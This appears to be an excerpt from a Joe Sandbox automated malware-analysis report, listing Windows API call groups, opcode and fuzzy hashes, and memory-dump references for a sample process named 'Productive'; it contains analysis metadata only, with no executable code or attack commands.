                                                                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                                                                • Opcode ID: 422dbf1518da73a1b585cdf952f65f4084a3c4e57c28f88d18f9de02227aae23
                                                                                                                                                                • Instruction ID: 89b079208f562088be38c96a2fe5be2bfc660a9344e6ec052bd494a52a05d45b
                                                                                                                                                                • Opcode Fuzzy Hash: 422dbf1518da73a1b585cdf952f65f4084a3c4e57c28f88d18f9de02227aae23
                                                                                                                                                                • Instruction Fuzzy Hash: E411223A201344AFCB26AF74DC55D7A77B8FF46310B41842AF906CB2A0EB30E850CB90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 002B16B4
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 002EB93C
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 002EB946
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 002EB951
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4127811313-0
                                                                                                                                                                • Opcode ID: c0a864d75aff1724fa72e6215550649a22b386b3f4dfa29a4c01f51f089537c1
                                                                                                                                                                • Instruction ID: f86a2b01bfd580b84bcb8a9f2c94d18c82195352d2660156d04df0891e5fa3b2
                                                                                                                                                                • Opcode Fuzzy Hash: c0a864d75aff1724fa72e6215550649a22b386b3f4dfa29a4c01f51f089537c1
                                                                                                                                                                • Instruction Fuzzy Hash: 98114639A20019ABCB15EF98C895DFE77BCEB09340F900455EA51EB150D730BA61CFA1
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00309719
                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0030972B
                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00309741
                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0030975C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                • Opcode ID: ed27bfeb99c16d426b42d8f3c1a79b535aed5a2f1833caea5fe3ac99f8adfcc8
                                                                                                                                                                • Instruction ID: 36c13784777c8ae02000b2dcdaf71e40937b60fd91b667550fb693f17ec5b64d
                                                                                                                                                                • Opcode Fuzzy Hash: ed27bfeb99c16d426b42d8f3c1a79b535aed5a2f1833caea5fe3ac99f8adfcc8
                                                                                                                                                                • Instruction Fuzzy Hash: 9811483A901218FFEB11DF95CD84F9DBBB8FB48710F204092EA04B7290D671AE10DB90
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00315075
                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 003150A8
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003150BE
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003150C5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                • Opcode ID: a9407192cc9b9ab8adb619a76b760d9342988bf65fc2a0ae0bdba66d28f5d09f
                                                                                                                                                                • Instruction ID: 73ff05c09e17a7ee17505461990d34583a723019238bfcccbefb4c95a2690d2a
                                                                                                                                                                • Opcode Fuzzy Hash: a9407192cc9b9ab8adb619a76b760d9342988bf65fc2a0ae0bdba66d28f5d09f
                                                                                                                                                                • Instruction Fuzzy Hash: C3114C76904608BBC7179FA89C08ADB7FACEB89320F100255F928D3361D6718D808BF0
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B214F
                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 002B2163
                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 002B216D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3970641297-0
                                                                                                                                                                • Opcode ID: 40a95285eea199ad10b967ef81ae8353d4034ddce37eb3ff1d276d307c16d86c
                                                                                                                                                                • Instruction ID: fd2708ca08890c979cd60359388dfda799dbcc8339e031f21189f385ee0492c2
                                                                                                                                                                • Opcode Fuzzy Hash: 40a95285eea199ad10b967ef81ae8353d4034ddce37eb3ff1d276d307c16d86c
                                                                                                                                                                • Instruction Fuzzy Hash: 1E118BB2221249BFDB164F94DC84EEB7B6DEF59394F050105FB0856121CB31AC60DBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 002E50EB
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 002E50FA
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 002E5103
                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 002E5110
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                • Opcode ID: e57200f31cf5d3f78c9c6c09588b6858e7c02925e253da08982359b1e7dd7f9a
                                                                                                                                                                • Instruction ID: ba47eb73a3612f3ef16abac560fc5b05f5b3101cafcbf37a8fe2d4132296d5e1
                                                                                                                                                                • Opcode Fuzzy Hash: e57200f31cf5d3f78c9c6c09588b6858e7c02925e253da08982359b1e7dd7f9a
                                                                                                                                                                • Instruction Fuzzy Hash: 1111C475D21258DBCF19DFF4D9086AE77F8EB08304FA1046AD807DB250EF346A008B40
                                                                                                                                                                APIs
                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003104EC,?,0031153F,?,00008000), ref: 0031195E
                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003104EC,?,0031153F,?,00008000), ref: 00311983
                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003104EC,?,0031153F,?,00008000), ref: 0031198D
                                                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,003104EC,?,0031153F,?,00008000), ref: 003119C0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                • Opcode ID: a6baeede92976cba963c36f033e146dca907226ebee993534895094d4a3c24cb
                                                                                                                                                                • Instruction ID: e52e11b5156effe40eb33db99b73654baeedb29de1abcad5cc039070753c6cca
                                                                                                                                                                • Opcode Fuzzy Hash: a6baeede92976cba963c36f033e146dca907226ebee993534895094d4a3c24cb
                                                                                                                                                                • Instruction Fuzzy Hash: A2115A35D0051CDBCF099FA4D998BEEBB78FF0E701F014046EA90B6240CB30A6A08BD5
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0033E1EA
                                                                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0033E201
                                                                                                                                                                • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0033E216
                                                                                                                                                                • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0033E234
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1352324309-0
                                                                                                                                                                • Opcode ID: 3d6af6639dba13e6fff74a73254e3d04b94221972741ccbf5c9777ec45befd3e
                                                                                                                                                                • Instruction ID: 61059993882b15503a31c4481836f02ca2bd85345fb5352a383d52903251e608
                                                                                                                                                                • Opcode Fuzzy Hash: 3d6af6639dba13e6fff74a73254e3d04b94221972741ccbf5c9777ec45befd3e
                                                                                                                                                                • Instruction Fuzzy Hash: 2F1161B53053149BE3319F51DD48F93BBBCEB00B00F108959A726DA590DBB0F5049FA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0033B956
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0033B96E
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0033B992
                                                                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0033B9AD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 357397906-0
                                                                                                                                                                • Opcode ID: cfd0f3829a929b9bbd09445fc25b7fba1103fb6302cbeadd93a219991c307d29
                                                                                                                                                                • Instruction ID: f144070ea53ed7ca9e2990dd01ef758a31c9ed13aa28dad7e0e0ee952155372b
                                                                                                                                                                • Opcode Fuzzy Hash: cfd0f3829a929b9bbd09445fc25b7fba1103fb6302cbeadd93a219991c307d29
                                                                                                                                                                • Instruction Fuzzy Hash: 301163B9D00209EFDB41CF98C884AEEFBF9FB49310F104156E915E3210D735AA618F50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002B1729
                                                                                                                                                                  • Part of subcall function 002B16CF: SelectObject.GDI32(?,00000000), ref: 002B1738
                                                                                                                                                                  • Part of subcall function 002B16CF: BeginPath.GDI32(?), ref: 002B174F
                                                                                                                                                                  • Part of subcall function 002B16CF: SelectObject.GDI32(?,00000000), ref: 002B1778
                                                                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0033C3E8
                                                                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 0033C3F5
                                                                                                                                                                • EndPath.GDI32(00000000), ref: 0033C405
                                                                                                                                                                • StrokePath.GDI32(00000000), ref: 0033C413
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1539411459-0
                                                                                                                                                                • Opcode ID: f53c39de6fe42f8c43cfc970d5a66c21469006b991c598ce161be342baebaef6
                                                                                                                                                                • Instruction ID: 80b79fb1f54cae72c961ddf2c7189b89ae8d4c7486c79c2cee4393ebfbc7637b
                                                                                                                                                                • Opcode Fuzzy Hash: f53c39de6fe42f8c43cfc970d5a66c21469006b991c598ce161be342baebaef6
                                                                                                                                                                • Instruction Fuzzy Hash: DFF0E235105218BBDB232F52AC0EFCE3F5DAF06310F048000FB11650E28BB42560DFA9
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0030AA6F
                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0030AA82
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0030AA89
                                                                                                                                                                • AttachThreadInput.USER32(00000000), ref: 0030AA90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                • Opcode ID: bcd3c3c71329a9d56f84fc3e5000448375021db7ad461f8f95ee406e9add3e5a
                                                                                                                                                                • Instruction ID: 7b5db73fbef693eff9bfd480faed49dee2ec89b3734586b6aa696714d6cf14cb
                                                                                                                                                                • Opcode Fuzzy Hash: bcd3c3c71329a9d56f84fc3e5000448375021db7ad461f8f95ee406e9add3e5a
                                                                                                                                                                • Instruction Fuzzy Hash: E5E0303564532876DB225FA1AD0CEDB3F1CEF127A1F018011FA09890A0CA759550CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 002B260D
                                                                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 002B2617
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 002B262C
                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 002B2634
                                                                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 002EC1C4
                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 002EC1D1
                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 002EC1EA
                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 002EC203
                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 002EC223
                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 002EC22E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1946975507-0
                                                                                                                                                                • Opcode ID: 8b7852494c257f36c27e5e463478e3590f673c8a1e6a016b3454018c2ec48bb8
                                                                                                                                                                • Instruction ID: 5d38cbe57d97de7f0861d09baf3f843260ab732a4bf9d72389a3a3d7a18c59a5
                                                                                                                                                                • Opcode Fuzzy Hash: 8b7852494c257f36c27e5e463478e3590f673c8a1e6a016b3454018c2ec48bb8
                                                                                                                                                                • Instruction Fuzzy Hash: B6E06535644284BBDB265FB4AC097D83B15EB06331F148366FF695C0E18B715590DB11
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00309339
                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00308F04), ref: 00309340
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00308F04), ref: 0030934D
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00308F04), ref: 00309354
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3974789173-0
                                                                                                                                                                • Opcode ID: 247639b0e7380fae0ef14a68f464065d81296959f3cbcf76f2104788ff8f822c
                                                                                                                                                                • Instruction ID: 692d889a644e30b04996b4fb3dfe0533312d5474aa9f0c146bccf6b550f5933b
                                                                                                                                                                • Opcode Fuzzy Hash: 247639b0e7380fae0ef14a68f464065d81296959f3cbcf76f2104788ff8f822c
                                                                                                                                                                • Instruction Fuzzy Hash: 3BE04F3A7022119BD7A61FF15D0DB563BACAF52791F118858A745CD0D0EA34A444CB50
                                                                                                                                                                APIs
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 002F0679
                                                                                                                                                                • GetDC.USER32(00000000), ref: 002F0683
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002F06A3
                                                                                                                                                                • ReleaseDC.USER32(?), ref: 002F06C4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                • Opcode ID: 8a051397d0ca41f87aeaa13198209975f03358b25a1c17f710dee3693466fd34
                                                                                                                                                                • Instruction ID: 3fa7b416b306aee1620591e413b0cf9e8269e6b37d6aecaf6fe1083044e5bd4a
                                                                                                                                                                • Opcode Fuzzy Hash: 8a051397d0ca41f87aeaa13198209975f03358b25a1c17f710dee3693466fd34
                                                                                                                                                                • Instruction Fuzzy Hash: 2AE01275910204DFCB065F60D84869D7BF9EF8C350F118419FE5ADB210CB7C55619F50
                                                                                                                                                                APIs
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 002F068D
                                                                                                                                                                • GetDC.USER32(00000000), ref: 002F0697
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002F06A3
                                                                                                                                                                • ReleaseDC.USER32(?), ref: 002F06C4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                • Opcode ID: 1cf64b60b42fd71676ad8906e49efbe5d1d29a4f979cb27462d0054c8f0c503e
                                                                                                                                                                • Instruction ID: a24afc27e81c83000d2aabb7bccb7e650407a530a37df1fb871c0a8bd6331c7e
                                                                                                                                                                • Opcode Fuzzy Hash: 1cf64b60b42fd71676ad8906e49efbe5d1d29a4f979cb27462d0054c8f0c503e
